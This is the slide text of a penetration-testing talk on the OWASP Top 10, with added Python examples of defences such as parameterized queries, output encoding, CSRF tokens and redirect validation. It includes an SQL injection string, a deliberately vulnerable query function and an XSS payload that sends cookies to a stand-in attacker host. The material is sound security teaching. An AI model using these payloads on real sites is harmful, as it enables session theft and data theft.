Penetration Testing following OWASP Boyan Yanchev – Chief Technology Officer Peter Dimkov – IS Consultant
About Lirex
“Penetration testing” A method of compromising the security of a computer system or network by simulating an attack by a malicious hacker.
Pentest Requirements by Standards. PCI-DSS Requirement 11: Regularly test security systems and processes. GDPR Article 32, 1 (d): a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing. ISO 27001: A.12.6 – Technical vulnerability management; A.9.4 – System and application access control; A.11.1.4 – Protecting against external and environmental threats; A.12.2 – Protection from malware; A.14.2.8 – System security testing; …
Types of “Penetration tests” (by target scope): Vulnerability assessment; Infrastructure penetration tests (internal, external); Web/application penetration tests (static web site, dynamic content and applications); Mobile application penetration tests.
Open Systems Interconnection model (OSI model) https://www.krackattacks.com/ https://www.dropbox.com/s/fexmecnnb6gg6y6/KevinMitnick_EmailHack.mp4?dl=0
Top 10 threats defined by OWASP for 2013 Open Web Application Security Project List of the Top 10 most critical WEB Application Security Risks The top 10 threats defined by OWASP for 2013 include: A1: Injection (Injection flaws, such as SQL, OS, and LDAP injection) A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Missing Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects and Forwards Totally free to use for personal and business use
OWASP Top 10 2017 RC2 – Released (20.10.2017). RC1 was rejected; RC2 was released on 20.10.2017; the final OWASP Top 10 2017 is to be released in late November 2017.
Top 10 threats defined by OWASP for 2013 Author: Alan Zeichick Principal Analyst, Camden Associates
A1. Injections. Injection attacks occur when unvalidated input is embedded in an instruction stream. Impact - SEVERE! Data can be stolen, modified, deleted. Client-side controls can easily be bypassed by an attacker. Related to: SQL, LDAP, anything that builds up a query from user input.
SQL Injection – Illustrated (source: OWASP). [Diagram: form fields Account / SKU → HTTP request → custom code on the app server → SQL query → DB table (Accounts) → HTTP response with the account summary.] The attacker submits ' OR 1=1-- in the Account field, so the application builds the query "SELECT * FROM accounts WHERE acct='' OR 1=1--'" and the response lists every account number in the table. 1. Application presents a form to the attacker. 2. Attacker sends an attack in the form data. 3. Application forwards the attack to the database in a SQL query. 4. Database runs the query containing the attack and sends encrypted results back to the application. 5. Application decrypts the data as normal and sends the results to the user.
Injection
A1. Injections Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
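Added example (not part of the original slides): the string-built query from the diagram beside its parameterized form, run against a constructed in-memory SQLite table, so the effect of the ' OR 1=1-- input can be observed directly.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the 'Accounts' database on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("5424-6066-2134-4334", "alice"),
         ("4128-7574-3921-0192", "bob"),
         ("5424-9383-2039-4029", "carol")],
    )
    return conn


def lookup_vulnerable(conn, acct):
    # The query text is built from user input: exactly the flaw in the diagram.
    # With the slide's payload it becomes ... WHERE acct='' OR 1=1--'
    sql = "SELECT acct FROM accounts WHERE acct='" + acct + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, acct):
    # The value is bound as a parameter; it is compared as data and can never
    # change the structure of the statement.
    rows = conn.execute("SELECT acct FROM accounts WHERE acct=?", (acct,))
    return [row[0] for row in rows]


PAYLOAD = "' OR 1=1--"   # the input shown on the OWASP illustration

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))      # every account in the table leaks
    print(lookup_parameterized(db, PAYLOAD))  # no account has that literal number
```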
A2. Broken Authentication and Session Management. Hijacking a user’s session: HTTP is a “stateless” protocol, which means that credentials have to go with every request; a SESSION ID is used to track state.
A2. Broken Authentication and Session Management. Vulnerabilities: session IDs are stored in the URL; guessable session IDs; session IDs do not time out; passwords are not stored hashed; credentials are sent in plain text.
A3. Cross-Site Scripting (XSS). The most prevalent web application security flaw. Enables the attacker to execute scripts in the victim’s browser. Used to: steal the user’s session; steal sensitive data; rewrite the web page (insert malicious content); redirect the user to a phishing or malware site. Be sure to sanitize your input fields!
A3. Cross-Site Scripting (XSS). Example payloads: <script>alert('XSS Attack!')</script> and <script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>
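Added example (not from the slides): the same untrusted comment rendered without and with output encoding, plus an attribute-context renderer for user-supplied links. The template markup and function names are constructed for the example.

```python
import html
from urllib.parse import urlsplit


def render_comment_unsafe(comment):
    # Untrusted text dropped straight into the page: the payloads on the slide run as script.
    return f'<p class="comment">{comment}</p>'


def render_comment(comment):
    # HTML-encode for the body context; quote=True also makes the text safe inside attributes.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_link(label, url):
    # Attribute context: encode the value AND refuse non-http(s) schemes such as javascript:,
    # which encoding alone would not neutralise.
    if urlsplit(url).scheme not in ("", "http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label, quote=True)}</a>'
```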
A4. Insecure Direct Object References. Accessing data or a system by changing a parameter value that refers to an object the user is not authorized to access.
A7. Missing Function Level Access Control. Threat: unauthorized access to functionality (privilege escalation). Authorization checks are often used only to generate the appropriate menus and show/hide various options. If an attacker is aware of the presence of these other functions he can attempt to call them directly; if the server does not check the permissions of this user, the privilege escalation succeeds.
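Added example (not from the slides) serving both A4 and A7: an object lookup that enforces ownership on the server no matter what id the request carries, and a privileged function that checks the caller's role itself instead of relying on the menu hiding the link. Orders, users and roles are constructed sample data.

```python
class Forbidden(Exception):
    """Raised when a server-side authorization check fails."""


# Constructed sample data standing in for the application's database.
ORDERS = {
    1001: {"owner": "alice", "total": 42.0},
    1002: {"owner": "bob", "total": 99.5},
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "admin"}


def get_order(user, order_id):
    """A4: order_id comes straight from the request, so ownership is enforced here.
    Missing and foreign ids get the same error, so the check does not leak which ids exist."""
    order = ORDERS.get(order_id)
    if order is None or (order["owner"] != user and ROLES.get(user) != "admin"):
        raise Forbidden(f"{user} may not view order {order_id}")
    return order


def require_role(role):
    """A7: the privileged function verifies the caller's role itself; whether the UI
    showed a link to it is irrelevant to the server."""
    def decorator(fn):
        def wrapper(user, *args, **kwargs):
            if ROLES.get(user) != role:
                raise Forbidden(f"{user} lacks role {role}")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def list_all_orders(user):
    return sorted(ORDERS)


def is_forbidden(fn, *args):
    """True if the call is rejected by an authorization check (used by the checks below)."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```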
A5. Security Misconfiguration Attack vectors: Missing (outdated) patches; Misconfigurations; Use of default accounts; Use of unnecessary services and features; Unprotected files and directories; Error messages not customized or blocked
A5. Security Misconfiguration
A6. Sensitive Data Exposure. When high-value data (passwords, credit card data, e-mails, etc.) is not properly handled by the application and not adequately protected on the web site, it is at serious risk of exposure. Identify the high-value data; use encryption.
A8. Cross-Site Request Forgery (CSRF). An attacker can cause the victim to change their password, username or e-mail, send a private message from the victim’s account, steal money or order goods with a single click on a link. Most frameworks have a mechanism to protect against CSRF.
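Added example (not from the slides) of the mechanism those frameworks provide: a per-session synchronizer token embedded in the form and verified in constant time on every state-changing POST, with an Origin check as defence in depth. The session dict, form layout and allowed origin are constructed for the example.

```python
import hmac
import secrets

ALLOWED_ORIGIN = "https://app.example"   # constructed: the application's own origin


def issue_csrf_token(session):
    # One unguessable token per session, kept server-side and embedded in each form.
    token = session.get("csrf_token")
    if token is None:
        token = session["csrf_token"] = secrets.token_hex(32)
    return token


def form_html(session, action):
    token = issue_csrf_token(session)
    return (f'<form method="POST" action="{action}">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="submit" value="Change password"></form>')


def handle_post(session, form, origin=None):
    """Perform the state change only if the submitted token matches the session's token.
    A forged form on another site cannot read the token, so it cannot supply it."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, submitted):
        return 403, "CSRF token missing or invalid"
    if origin is not None and origin != ALLOWED_ORIGIN:
        return 403, "cross-origin request rejected"   # browsers set Origin on cross-site POSTs
    return 200, "password changed"
```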
A9. Using Components with Known Vulnerabilities. Using things like framework libraries, plugins and the like. Components often run with the full privilege of the application. Attack: find exploits for a particular component (if components are not updated); exploit the vulnerability. Prevention: write your own components; always update to the most current version.
A10. Unvalidated Redirects and Forwards. A web application accepts untrusted input that causes it to redirect to a URL contained within that input. Used for launching phishing scams and stealing credentials.
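Added example (not from the slides): validating a redirect target taken from the request so that it can only land on the site itself, including the scheme-relative and backslash forms that a naive "starts with /" check lets through. The allowed host is constructed for the example.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"app.example"}   # constructed: the application's own host(s)


def safe_redirect_target(raw, default="/"):
    """Return raw only if it stays on this site; otherwise fall back to default."""
    if not raw:
        return default
    target = raw.strip().replace("\\", "/")   # browsers treat '\' like '/', so normalise first
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only http(s) to one of our own hosts is acceptable.
        # parts.hostname strips userinfo, so 'https://app.example@evil.example' is rejected.
        if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(("https", parts.netloc, parts.path or "/", parts.query, ""))
    if not target.startswith("/"):
        return default                           # relative paths such as 'evil.example' are not trusted
    return target
```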
Tools. Vulnerability assessment tools: Metasploit Framework, OpenVAS, Acunetix, Qualys, Nessus. Penetration testing tools: Metasploit Framework, The Pentesters Framework (PTF), Kali Linux, Nmap, Aircrack, SQLMap, Ettercap, Wireshark, Nikto/Wikto, SiteDigger. Proxies: Paros Proxy, OWASP ZAP, Burp Suite, various browser plugins.
Thank you!